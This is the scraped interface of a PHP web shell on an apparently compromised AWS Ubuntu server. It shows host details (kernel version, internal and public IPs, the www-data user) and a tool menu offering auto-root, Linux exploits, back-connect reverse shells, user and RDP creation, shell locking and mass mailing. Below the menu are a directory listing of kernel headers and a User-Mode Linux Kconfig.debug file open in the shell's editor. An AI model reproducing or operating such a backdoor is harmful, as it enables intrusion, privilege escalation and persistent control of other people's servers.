Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.146.176.191
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-aws-5.4-headers-5.4.0-1093 /
arch /
um /
[ HOME SHELL ]
Name
Size
Permission
Action
drivers
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
kernel
[ DIR ]
drwxr-xr-x
os-Linux
[ DIR ]
drwxr-xr-x
scripts
[ DIR ]
drwxr-xr-x
Kconfig
5.4
KB
-rw-r--r--
Kconfig.debug
1012
B
-rw-r--r--
Makefile
5
KB
-rw-r--r--
Makefile-os-Linux
235
B
-rw-r--r--
Makefile-skas
290
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Kconfig.debug
# SPDX-License-Identifier: GPL-2.0 config GPROF bool "Enable gprof support" depends on DEBUG_INFO && FRAME_POINTER help This allows profiling of a User-Mode Linux kernel with the gprof utility. See <http://user-mode-linux.sourceforge.net/old/gprof.html> for more details. If you're involved in UML kernel development and want to use gprof, say Y. If you're unsure, say N. config GCOV bool "Enable gcov support" depends on DEBUG_INFO depends on !KCOV depends on !MODULES help This option allows developers to retrieve coverage data from a UML session. See <http://user-mode-linux.sourceforge.net/old/gprof.html> for more details. If you're involved in UML kernel development and want to use gcov, say Y. If you're unsure, say N. config EARLY_PRINTK bool "Early printk" default y ---help--- Write kernel log output directly to stdout. This is useful for kernel debugging when your machine crashes very early before the console code is initialized.
Close